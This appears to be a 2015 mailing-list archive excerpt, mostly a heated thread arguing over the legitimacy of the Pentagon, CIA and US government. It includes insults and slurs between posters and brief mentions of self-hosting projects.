<55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> Message-ID: <55AE10C2.6050501@pilobilus.net> On 07/21/2015 03:15 AM, Stephen D. Williams wrote: > On 7/20/15 10:32 PM, Juan wrote: >> On Mon, 20 Jul 2015 21:36:57 -0700 "Stephen D. Williams" >> wrote: [...] >> Are you saying the pentagon is good and useful? 
> > The Pentagon et al are protecting a large portion of the world > from being overrun. Nobody else will do it. And all along I thought, the sooner the Pentagon et al stood down and let the world be overrun, the better for the human race. Better in every measurable way, except for the net worth and sovereign power of the wealthy and powerful gangs that sponsor and direct those organizations. >> Politicians are morally responsible. The military are >> morally and materially responsible. > > Are police always bad too? Last I heard, police forces were not dispatched to cross borders and kill large numbers of people, to advance the financial agendas of some few thousands of the folks back home. When the police do what the military does, they become criminals even by the definition of the laws enacted by their own masters. Anyone who deliberately and for personal gain participates in mass murder might be considered "bad." I prefer to think of them as ignorant and disinformed, aside from a minority among them who are psychopathic and in need of minders. >> ... Is everyone from the CIA scumbags by definition? Yes. > > Whatever you gotta believe. Most of their job is to understand > the world, publishing both a nice public database and the > presidential daily brief (today's news). And to consult with > the President as need so that hopefully reasonably intelligent > decisions are made, but that depends on the intelligence of the > current president. So... If I understand this correctly, the CIA, a clandestine U.S. military service, is in the business of persuading Presidents, elected to embody the will of the People, to their way of thinking. Come to think of it, their charter implicitly says so. I guess we should have dumped them when we had the chance. IIRC a President once said he was going do just that, too bad somebody shot him. Every corporate entity needs intelligence to function. 
How many need a department to promote, codify and implement torture as a psychological weapon? How many need a department that arms, trains and directs gangs of killers to put inconvenient market competitors out of business, and take over their shops? How many need a department to set up and run major drug smuggling operations, to fund other violent criminal enterprises off the books? I try not to go around calling people "scumbags" and come to think of it, I succeed. But there's no denying that working for the CIA in any capacity imparts a certain taint, given that it has been a criminal enterprise more or less since its inception and shows no signs of meaningful reform. By "criminal" I mean, per any common sense definition that does not duck the issue by asserting that certain functions of State are by definition "above the law" due to some existential necessity. A MAFIA bookkeeper who always does an honest day's work and never hurts anybody is not a criminal, right? >>> What's your alternative to all of these things? If you >>> really are into security in any sense, you should be able >>> to explain what security exposures moderating or >>> eliminating those entities would cause and what you would >>> advocate to replace them. >> Are you talking about the US military? > And FBI, CIA, State, Google, etc. Practical alternatives to endemic, high dollar institutional violence are limited by the inherent nature of the institutions that carry it out: They exist to impose the will of their masters on whole societies. They defeat their masters' specified enemies by any means necessary, which covers a spectrum from propaganda through deception, bribery and terrorism to the industrialized mass murder we call warfare. Try to stop them; if you show signs of success, their masters will direct them to neutralize YOU by any means necessary. As things stand, we don't have enough volunteers to shut down the killing machine by direct intervention. 
If and when we do, the emergent organizations that make it possible will also play key roles in developing long term solutions for international conflicts. As a practical matter, one must do what one can to stop the bleeding; such efforts tend to be contagious, and we have ways of spreading that contagion. It starts with telling the truth. Opportunities to do that keep coming faster and faster. >>> I'm offended in various ways by a lot of what happened in >>> the past, often in organizations like DOJ, FBI, etc. that >>> should have known better. >> Should they? Looks like you don't know what government is. > Wha? Most people don't know what government is, because those who govern use a very different definition than the ones the governed are taught: State sovereignty is the power to rob, kidnap and kill withing a given territorial boundary, and to defend these powers as one's exclusive prerogative. Anarchists are consistently depicted as violent lunatics opposed to any form of social order. The idea that government is based on the consent of the governed is all well and good in a civics class, but God forbid someone should try to actually implement that fine theory by withdrawing their consent from particular incarnations and/or functions of government. >> Worthless murdering scumbags are 'respectable' people and >> not 'fundamentally evil'. Sure. Maybe they are >> 'accidentally' evil? > > DOJ, Treasury, State, HHS, etc. are filled with worthless > murdering scumbags? I would not say so, but broadly speaking, they are directed by political appointees who, to varying extents, run them as criminal enterprises. Criminal, even by the very liberal and tolerant standards set by the State that employs them. > There are certain people, Marines et al, who are trained to be > very lethal. Sucks to need that, but being anything less than > the strongest & baddest isn't an option for the US. They are > concentrated, supposed to be carefully deployed and directed. 
> Create people like that from the subset of people who want to > be like that and a few are going to go off the rails > occasionally. That's a bummer, and needs to be constantly > protected against, but there's no obvious alternative. To me, the alternatives are painfully obvious. Step one in a real "war against terror" is to stop doing terrorism. Step one in defending a country's "way of life" is to invest in its human and industrial infrastructure. It certainly makes no sense to indulge in multi-trillion dollar tax and debt funded economic bonfires that produce nothing but paychecks, stock dividends and the odd few million dead bodies and refugees here and there. > The US is the least imperialist top superpower that ever > existed. Still not perfect, but better than all the rest. That's kind of like advertising oneself as the kindest, most considerate serial killer presently at large. It doesn't take a lifetime of study or exceptional brain power to recognize gross offenses to the values that define human beings as social animals fit to walk the Earth. It does take a lifetime of study and exceptional brain power, on the part of a whole managerial class, to direct that society to commit such offenses and take them for granted as regrettable necessities. The survival value of human intelligence has not been satisfactorily demonstrated. Its hazards are becoming more obvious every day. 
:o/ From juan.g71 at gmail.com Tue Jul 21 01:59:52 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 05:59:52 -0300 Subject: an ominous comment In-Reply-To: <55ADF184.9070004@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> Message-ID: <55ae09c4.b4528c0a.4721.48fc@mx.google.com> On Tue, 21 Jul 2015 00:15:16 -0700 "Stephen D. Williams" wrote: > On 7/20/15 10:32 PM, Juan wrote: > > On Mon, 20 Jul 2015 21:36:57 -0700 > > "Stephen D. Williams" wrote: > > > >> On 7/20/15 9:07 PM, Juan wrote: > >>> Hey. *Now* I get it. > >>> > >>> This mailing list has a lot of tor-tards who are > >>> apologists of the pentagon's propaganda and spying efforts. > >> Are you saying that the Pentagon is never good or useful? Nor are > >> any of their spying efforts?
> > Are you saying the pentagon is good and useful? > > The Pentagon et al are protecting a large portion of the world from > being overrun by aliens from the 5th dimension, right. > Nobody else will do it. correct. > > >> ... > >> when they don't determine their goals or rules of > >> engagement? Their job is to be a bad ass tool, the proverbial big > >> stick. It is someone else's job to decide how to use that tool. > >> Marines don't kill people, politicians using Marines kill people. > >> Err, something like that. > > > > Marines and other 'military personnel' murder people when > > 'ordered' to. They are the worst scumbags on earth. > > > > Politicians are morally responsible. The military are > > morally and materially responsible. > > Are police always bad too? Yep. Same kind of psycho. > > > ... > > Is everyone from the CIA scumbags by definition? > > Yes. > > Whatever you gotta believe. Most of their job is to understand the > world, publishing both a nice public database and the presidential > daily brief (today's news). And to consult with the President as > need so that hopefully reasonably intelligent decisions are made, but > that depends on the intelligence of the current president. are you for real? > > >> ... > > > > ... > >>> J. > >>> > >> What's your alternative to all of these things? If you really are > >> into security in any sense, you should be able to explain what > >> security exposures moderating or eliminating those entities would > >> cause and what you would advocate to replace them. > > > > Are you talking about the US military? > And FBI, CIA, State, Google, etc. I suggest you go to a library and get a few books. > > > > > > > >> I would even say that a lot of government employees and > >> contractors seem to have got away with a lot of things they > >> shouldn't have. But that doesn't mean that any of those > >> organizations are fundamentally evil and aren't almost completely > >> staffed by intelligent, respectable people. 
> > > > LOL. So, how much trolling should I let you get away with? > > > > Worthless murdering scumbags are 'respectable' people and > > not 'fundamentally evil'. Sure. Maybe they are 'accidentally' > > evil? > > DOJ, Treasury, State, HHS, etc. are filled with worthless murdering > scumbags? Oh, all of them believe in murdering anybody who doesn't recognize their divine authority. You know, the one and only 'argument' behind government : obey or die. > > There are certain people, Marines et al, who are trained to be very > lethal. Sucks to need that, but being anything less than the > strongest & baddest isn't an option for the US. Again, are you for real? > They are > concentrated, supposed to be carefully deployed and directed. Create > people like that from the subset of people who want to be like that > and a few are going to go off the rails occasionally. That's a > bummer, and needs to be constantly protected against, but there's no > obvious alternative. Sure. > > The US is the least imperialist top superpower that ever existed. Sure. > Still not perfect, but better than all the rest. Sure. How does it feel to be a brain-dead americunt? Well, I guess at least it's not painful. You'd need some kind of functioning brain to feel pain. > > > How about they 'accidentally' beat you to a pulp and then > > feed you to the pigs? Just as an innocent mistake of course... > > Oh kay. Are you off your meds? No sonny. You are. What, you wouldn't like to be treated the way your marines treat other people? Tsk tsk. > >> Anyway, if you're still in the rebelling against authority stage, > >> fine, have fun. Good luck with that. In the US, government wise, > >> the people are the authority > > Really? That's an interesting concept. How many lsd doses do > > you need in order to reach the parallel universe where that > > is reality? Because in this universe, it isn't. > > You haven't been watching long or closely enough. 
Things have > changed a lot in the US in my lifetime, and it's only speeding up. You are either out of your mind, trolling, or both. Or you mean that final coming of the americunt police state is speeding up? > > >> , their own authority in essence, it just > >> may take a long time for that to play out in a given area. > > Sure. That's how jesus planned it all. > > Nonsense again. > Yep, that's the only thing you are throwing up. Actually it's propaganda but it's so fucking stupid that "nonsense" describes it as well. So yeah. Google and the cloud. Maybe you got 'cypherpunk' and 'neocunt' mixed up. > > > >> In some > >> ways, this is also true for companies, with some nuance. > >> > >> sdw > >> > > sdw > From grarpamp at gmail.com Tue Jul 21 03:02:16 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 21 Jul 2015 06:02:16 -0400 Subject: an ominous comment In-Reply-To: <6026027D-4A9F-4D2E-A17A-6BD7C6F99B55@openmailbox.org> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <6026027D-4A9F-4D2E-A17A-6BD7C6F99B55@openmailbox.org> Message-ID: On Tue, Jul 21, 2015 at 4:32 AM, oshwm wrote: > You lot sound like the types that'd run openbsd on your desktops :D That's not a bug. 
From list at sysfu.com Tue Jul 21 06:58:52 2015 From: list at sysfu.com (Seth) Date: Tue, 21 Jul 2015 06:58:52 -0700 Subject: an ominous comment In-Reply-To: <55AE10C2.6050501@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> Message-ID: On Tue, 21 Jul 2015 02:28:34 -0700, Steve Kinney wrote: Steve, that was a tour de force. I was about to leap out of my chair and start pounding out a similar reply but you pretty much summed how I feel to the tee. Correct me if I'm wrong, but aren't the roots of the Cypherpunk movement more or less explicitly anarchist? The number of state-theists on this list never ceases to amaze. From list at sysfu.com Tue Jul 21 07:14:27 2015 From: list at sysfu.com (Seth) Date: Tue, 21 Jul 2015 07:14:27 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: <1967648.u6W7a8k46C@lapuntu> References: <179659091.PKgjI4HLZx@lapuntu> <1967648.u6W7a8k46C@lapuntu> Message-ID: On Sat, 18 Jul 2015 14:09:21 -0700, rysiek wrote: > Run your own servers, control your own infrastructure. There are ways to > do > it. Next on my "ToTest" list is this, for instance: > https://github.com/sovereign/sovereign Funny you mention the Sovereign project, I stumbled upon it myself for the first time last week. I had already been in the process of building my own version of essentially the same thing, only geared more towards Parabola GNU/Linux and Open/FreeBSD. 
Another interesting project for wresting back control of your data and services is indiehosters [1][2] Probably a better option for those without copious amounts of free time and the technical skills and desire to implement a DIY solution. [1] http://www.wired.com/2014/11/indie-hosters/ [2] https://indiehosters.net/ From shelley at misanthropia.org Tue Jul 21 07:46:16 2015 From: shelley at misanthropia.org (Shelley) Date: Tue, 21 Jul 2015 07:46:16 -0700 Subject: an ominous comment In-Reply-To: <55AE10C2.6050501@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> Message-ID: <20150721144600.57358C00023@frontend1.nyi.internal> On July 21, 2015 2:35:23 AM Steve Kinney wrote a post that deserves to be QFT, so it's included below: Echoing Seth's sentiment, but wanted to be sure your post was read by anyone who might have missed it. I truly don't have the time right now to pen the kind of response I wanted to after reading those state apologist diatribes. Upon reading your reply below, I see you have it covered (and you made your point without the salty language I may have used. Heh.) +1, +1, +1... -Shelley > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On 07/21/2015 03:15 AM, Stephen D. Williams wrote: > > On 7/20/15 10:32 PM, Juan wrote: > >> On Mon, 20 Jul 2015 21:36:57 -0700 "Stephen D. Williams" > >> wrote: > > [...] > > >> Are you saying the pentagon is good and useful? > > > > The Pentagon et al are protecting a large portion of the world > > from being overrun. Nobody else will do it. 
> > And all along I thought, the sooner the Pentagon et al stood down > and let the world be overrun, the better for the human race. > Better in every measurable way, except for the net worth and > sovereign power of the wealthy and powerful gangs that sponsor and > direct those organizations. > > >> Politicians are morally responsible. The military are > >> morally and materially responsible. > > > > Are police always bad too? > > Last I heard, police forces were not dispatched to cross borders > and kill large numbers of people, to advance the financial agendas > of some few thousands of the folks back home. When the police do > what the military does, they become criminals even by the > definition of the laws enacted by their own masters. > > Anyone who deliberately and for personal gain participates in mass > murder might be considered "bad." I prefer to think of them as > ignorant and disinformed, aside from a minority among them who are > psychopathic and in need of minders. > > >> ... Is everyone from the CIA scumbags by definition? Yes. > > > > Whatever you gotta believe. Most of their job is to understand > > the world, publishing both a nice public database and the > > presidential daily brief (today's news). And to consult with > > the President as need so that hopefully reasonably intelligent > > decisions are made, but that depends on the intelligence of the > > current president. > > So... If I understand this correctly, the CIA, a clandestine U.S. > military service, is in the business of persuading Presidents, > elected to embody the will of the People, to their way of > thinking. Come to think of it, their charter implicitly says so. > I guess we should have dumped them when we had the chance. IIRC a > President once said he was going to do just that, too bad somebody > shot him. > > Every corporate entity needs intelligence to function. How many > need a department to promote, codify and implement torture as a > psychological weapon?
How many need a department that arms, > trains and directs gangs of killers to put inconvenient market > competitors out of business, and take over their shops? How many > need a department to set up and run major drug smuggling > operations, to fund other violent criminal enterprises off the books? > > I try not to go around calling people "scumbags" and come to think > of it, I succeed. But there's no denying that working for the CIA > in any capacity imparts a certain taint, given that it has been a > criminal enterprise more or less since its inception and shows no > signs of meaningful reform. By "criminal" I mean, per any common > sense definition that does not duck the issue by asserting that > certain functions of State are by definition "above the law" due > to some existential necessity. A MAFIA bookkeeper who always does > an honest day's work and never hurts anybody is not a criminal, right? > > >>> What's your alternative to all of these things? If you > >>> really are into security in any sense, you should be able > >>> to explain what security exposures moderating or > >>> eliminating those entities would cause and what you would > >>> advocate to replace them. > >> Are you talking about the US military? > > And FBI, CIA, State, Google, etc. > > Practical alternatives to endemic, high dollar institutional > violence are limited by the inherent nature of the institutions > that carry it out: They exist to impose the will of their masters > on whole societies. They defeat their masters' specified enemies > by any means necessary, which covers a spectrum from propaganda > through deception, bribery and terrorism to the industrialized > mass murder we call warfare. Try to stop them; if you show signs > of success, their masters will direct them to neutralize YOU by > any means necessary. > > As things stand, we don't have enough volunteers to shut down the > killing machine by direct intervention.
If and when we do, the > emergent organizations that make it possible will also play key > roles in developing long term solutions for international conflicts. > > As a practical matter, one must do what one can to stop the > bleeding; such efforts tend to be contagious, and we have ways of > spreading that contagion. It starts with telling the truth. > Opportunities to do that keep coming faster and faster. > > >>> I'm offended in various ways by a lot of what happened in > >>> the past, often in organizations like DOJ, FBI, etc. that > >>> should have known better. > >> Should they? Looks like you don't know what government is. > > Wha? > > Most people don't know what government is, because those who > govern use a very different definition than the ones the governed > are taught: State sovereignty is the power to rob, kidnap and > kill within a given territorial boundary, and to defend these > powers as one's exclusive prerogative. > > Anarchists are consistently depicted as violent lunatics opposed > to any form of social order. The idea that government is based on > the consent of the governed is all well and good in a civics > class, but God forbid someone should try to actually implement > that fine theory by withdrawing their consent from particular > incarnations and/or functions of government. > > >> Worthless murdering scumbags are 'respectable' people and > >> not 'fundamentally evil'. Sure. Maybe they are > >> 'accidentally' evil? > > > > DOJ, Treasury, State, HHS, etc. are filled with worthless > > murdering scumbags? > > I would not say so, but broadly speaking, they are directed by > political appointees who, to varying extents, run them as criminal > enterprises. Criminal, even by the very liberal and tolerant > standards set by the State that employs them. > > > There are certain people, Marines et al, who are trained to be > > very lethal. Sucks to need that, but being anything less than > > the strongest & baddest isn't an option for the US.
They are > > concentrated, supposed to be carefully deployed and directed. > > Create people like that from the subset of people who want to > > be like that and a few are going to go off the rails > > occasionally. That's a bummer, and needs to be constantly > > protected against, but there's no obvious alternative. > > To me, the alternatives are painfully obvious. Step one in a real > "war against terror" is to stop doing terrorism. Step one in > defending a country's "way of life" is to invest in its human and > industrial infrastructure. It certainly makes no sense to indulge > in multi-trillion dollar tax and debt funded economic bonfires > that produce nothing but paychecks, stock dividends and the odd > few million dead bodies and refugees here and there. > > > The US is the least imperialist top superpower that ever > > existed. Still not perfect, but better than all the rest. > > That's kind of like advertising oneself as the kindest, most > considerate serial killer presently at large. > > It doesn't take a lifetime of study or exceptional brain power to > recognize gross offenses to the values that define human beings as > social animals fit to walk the Earth. It does take a lifetime of > study and exceptional brain power, on the part of a whole > managerial class, to direct that society to commit such offenses > and take them for granted as regrettable necessities. > > The survival value of human intelligence has not been > satisfactorily demonstrated. Its hazards are becoming more > obvious every day. 
> > :o/ > > -----END PGP SIGNATURE----- From zen at freedbms.net Tue Jul 21 01:17:26 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 21 Jul 2015 08:17:26 +0000 Subject: an ominous comment In-Reply-To: <55adc555.0ae88c0a.425f.3132@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> Message-ID: On 7/21/15, Juan wrote: > Hey. *Now* I get it. > > This mailing list has a lot of tor-tards who are apologists of > the pentagon's propaganda and spying efforts. > > It has people who say that the NSA does good things (coderman) > > It has apologists of the US marines. > > It has high ranking scumbags from the CIA. > > It has commie 'anarchists' who are offended by (and would love > to silence) people who badmouth the marines' apologists. > > And NOW it also has a google and cloud apologist. Welcome > Stephen =) You are yet another reason to distrust the FLOSS movement and > its bloatware. Lemme guess - you're new here? Welcome :) From zen at freedbms.net Tue Jul 21 01:23:20 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 21 Jul 2015 08:23:20 +0000 Subject: an ominous comment In-Reply-To: <55ADCC69.1060207@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: On 7/21/15, Stephen D. Williams wrote: > On 7/20/15 9:07 PM, Juan wrote: >> And NOW it also has a google and cloud apologist. 
Welcome >> Stephen =) You are yet another reason to distrust the FLOSS movement and >> its bloatware. > > FLOSS has bloatware? Nah - firefox is a lithe little vegetarian pea pod, lucky to use 1% of one CPU and a bee's proverbial of your RAM, LibreOffice is so small and feature free it's lucky to even print a document, and the Linux kernel, well, it's so clean, small and well documented it's just a few lines longer than HelloWorld.c - so of course it's well audited and highly secure as a result. Couldn't ask for cleaner security really. Nope, no bloatware round these parts. Someone missed the memo... From zen at freedbms.net Tue Jul 21 01:39:20 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 21 Jul 2015 08:39:20 +0000 Subject: an ominous comment In-Reply-To: <55ADCC69.1060207@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: On 7/21/15, Stephen D. Williams wrote: ... > I'm offended in various ways by a lot of what happened in the past, > often in organizations like DOJ, FBI, etc. that should have > known better. Tut, tut! They should have indeed. > I would even say that a lot of government employees and > contractors seem to have got away with a lot of things they > shouldn't have. Naughty, naughty I tell you! Naughty little boys and girls. > But that doesn't mean that any of those organizations are > fundamentally evil and aren't almost completely staffed > by intelligent, respectable people. Wonderful! There's hope! U S A, U S A! 
So those intelligent CIA guys will stop toppling regimes by murder and plunder, to keep the US$ afloat and to keep trying for their one world f-ing government, and those respectable NSA guys will use their phone tapping of France, Germany, UK, Australia and every other nation's politicians to create a safer, cleaner, more caring world, with regional sovereignty respected, the will of the people upheld, and a fundamentally fairer wealth system throughout the world! Hallelujah brothers and sisters, Amerika vilt save youse all. Now bend over and think of something pleasant. > Anyway, if you're still in the rebelling against authority stage, fine, have > fun. Good luck with that. In the US, government wise, > the people are the authority, Damn, how many of us wish that were true. Being the authority in principle, is so vastly different to living that authority. We saw all that gung-ho hoo hah go right out the window when the US Marshals roamed the streets and confiscated by force of armed guard requests, many (most?) of the guns in the area. http://www.infowars.com/nra-the-untold-story-of-gun-confiscation-after-katrina/ > their own authority in essence, it just may Ahh yes, that's more like it, just an essence of authority, a remnant, not much actual authority in the people. Sadly. So very very sadly. We can only hope that people will wake up and start living their rights. > take a long time for that to play out in a given area. In By the time people wake up, it's usually too late. Pol Pot's people never woke up and when asked why he caused the massacre of much of his nation, he answered "it was an experiment", AIUI to see what people would do in the face of such evil. > some ways, this is also true for companies, with some nuance. Man that's some good weed you're smokin, don't be so greedy and pass it around bro!
From zen at freedbms.net Tue Jul 21 02:03:27 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 21 Jul 2015 09:03:27 +0000 Subject: an ominous comment In-Reply-To: <55ADF184.9070004@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> Message-ID: On 7/21/15, Stephen D. Williams wrote: > On 7/20/15 10:32 PM, Juan wrote: >> On Mon, 20 Jul 2015 21:36:57 -0700 >> "Stephen D. Williams" wrote: >> >>> On 7/20/15 9:07 PM, Juan wrote: >>>> Hey. *Now* I get it. >>>> >>>> This mailing list has a lot of tor-tards who are apologists >>>> of the pentagon's propaganda and spying efforts. >>> Are you saying that the Pentagon is never good or useful? Nor are >>> any of their spying efforts? >> Are you saying the pentagon is good and useful? > > The Pentagon et al are protecting a large portion of the world from being > overrun. Nobody else will do it. Damn! From Russia and China yeah? Wow. What a mindset. https://en.wikipedia.org/wiki/Covert_United_States_foreign_regime_change_actions "The United States has been involved in and assisted in the overthrow of foreign governments (more recently termed "regime change") without the overt use of U.S. military force. Often, such operations are tasked to the Central Intelligence Agency (CIA)." I grant they seem to be doing ... something. 
Here's the table of contents from that wiki page: Contents 1 Cold War 1.1 Syria 1949 1.2 Iran 1953 1.3 Guatemala 1954 1.4 Tibet 1955–70s 1.5 Indonesia 1958 1.6 Cuba 1959 1.7 Iraq 1960–63 1.8 Democratic Republic of the Congo 1960–65 1.9 Dominican Republic 1961 1.10 South Vietnam 1963 1.11 Brazil 1964 1.12 Chile 1970–73 1.13 Afghanistan 1979–89 1.14 Turkey 1980 1.15 Poland 1980–89 1.16 Nicaragua 1981–90 1.16.1 Destablization through CIA assets 1.16.2 Arming the Contras 2 Post–Cold War 2.1 Iraq 1992–96 2.2 Venezuela 2002 2.3 Iran 2005–present Perhaps those are the countries that were going to overrun "us" (never mind the fact I live in Australia anyway, but damn, what a way of thinking). SDW, thank you for being so frank - honest about how you think. It is educational to me in a good way. Part of the difference is perhaps that I am not living in the USA, so I look inwards to your government and agencies, not outwards. >>> when they don't determine their goals or rules of >>> engagement? Their job is to be a bad ass tool, the proverbial big >>> stick. It is someone else's job to decide how to use that tool. >>> Marines don't kill people, politicians using Marines kill people. >>> Err, something like that. >> >> Marines and other 'military personnel' murder people when >> 'ordered' to. They are the worst scumbags on earth. >> >> Politicians are morally responsible. The military are morally >> and materially responsible. > > Are police always bad too? > >> ... >> Is everyone from the CIA scumbags by definition? >> Yes. > > Whatever you gotta believe. > Most of their job is to understand the world, :) Interesting way of "understanding" the world - 'regime change' is about as polite a way the current empire can couch its predominant activity since WWII. > publishing both a nice public database and the > presidential daily brief (today's news). 
And to consult with the President > as need so that hopefully reasonably intelligent > decisions are made, but that depends on the intelligence of the current > president. Sounds like you're focusing on the small stuff, the little "local" political show. And a show it is, and apparently quite effective... >>> What's your alternative to all of these things? If you really are >>> into security in any sense, you should be able to explain what >>> security exposures moderating or eliminating those entities would >>> cause and what you would advocate to replace them. >> >> Are you talking about the US military? > And FBI, CIA, State, Google, etc. >> >> >> >>> I'm offended in various ways by a lot of what happened in the past, >>> often in organizations like DOJ, FBI, etc. that should have known >>> better. >> Should they? Looks like you don't know what government is. > Wha? >> >> >> >>> I would even say that a lot of government employees and >>> contractors seem to have got away with a lot of things they shouldn't >>> have. But that doesn't mean that any of those organizations are >>> fundamentally evil and aren't almost completely staffed by >>> intelligent, respectable people. >> >> LOL. So, how much trolling should I let you get away with? >> >> Worthless murdering scumbags are 'respectable' people and not >> 'fundamentally evil'. Sure. Maybe they are 'accidentally' >> evil? > > DOJ, Treasury, State, HHS, etc. are filled with worthless murdering > scumbags? Time to wake up. You evidently need to do more research. The balance of good vs. evil, of the once mighty USA, is well and truly tipped in favour of despotism and cronyism at this point in history. Very unfortunately. And notwithstanding the good remnant who do remain actually within the system (as insignificant and ineffective as they are to effecting good into the world). Greece. Rome. Persia. British Empire. USA. Every empire falls. USA has fallen, it just can't quite see the reality of this yet. 
> There are certain people, Marines et al, who are trained to be very lethal. > Sucks to need that, but being anything less than the > strongest & baddest isn't an option for the US. They are concentrated, > supposed to be carefully deployed and directed. Create > people like that from the subset of people who want to be like that and a > few are going to go off the rails occasionally. That's a > bummer, and needs to be constantly protected against, but there's no obvious > alternative. > > The US is the least imperialist top superpower that ever existed. Still not > perfect, but better than all the rest. "No better than all the rest". Fixed that for you. The record is abysmal. USA is "morally" (on an international political and death-toll level) and financially bankrupt. I just pray that the end of USA's grab for global hegemony means a long lasting multi-polar world, and not a new imperialist Chinese "empire regime". >> How about they 'accidentally' beat you to a pulp and then feed >> you to the pigs? Just as an innocent mistake of course... > > Oh kay. Are you off your meds? You're missing the point. "Regime change" means if you're in their way, your life ends. Time for you to do some history lessons. Because you feel safe (you're one of the "good guys" right?), you don't see the problem, and you therefore have difficulty hearing the message. >>> Anyway, if you're still in the rebelling against authority stage, >>> fine, have fun. Good luck with that. In the US, government wise, >>> the people are the authority >> Really? That's an interesting concept. How many lsd doses do >> you need in order to reach the parallel universe where that >> is reality? Because in this universe, it isn't. > > You haven't been watching long or closely enough. Things have changed > a lot in the US in my lifetime, and it's only speeding up. Sadly, individual liberty was not respected enough to capture the sanction of foreign thinkers. 
I'm being extraordinarily conservative in my words here... >>> , their own authority in essence, it just >>> may take a long time for that to play out in a given area. >> Sure. That's how jesus planned it all. > > Nonsense again. > >> >>> In some >>> ways, this is also true for companies, with some nuance. >>> >>> sdw >>> > > sdw From oshwm at openmailbox.org Tue Jul 21 01:32:19 2015 From: oshwm at openmailbox.org (oshwm) Date: Tue, 21 Jul 2015 09:32:19 +0100 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: <6026027D-4A9F-4D2E-A17A-6BD7C6F99B55@openmailbox.org> You lot sound like the types that'd run openbsd on your desktops :D From odinn.cyberguerrilla at riseup.net Tue Jul 21 09:32:24 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Tue, 21 Jul 2015 09:32:24 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: References: <179659091.PKgjI4HLZx@lapuntu> <1967648.u6W7a8k46C@lapuntu> Message-ID: <55AE7418.5090806@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 That's pretty cool, the indiehosters.net thing which I hadn't 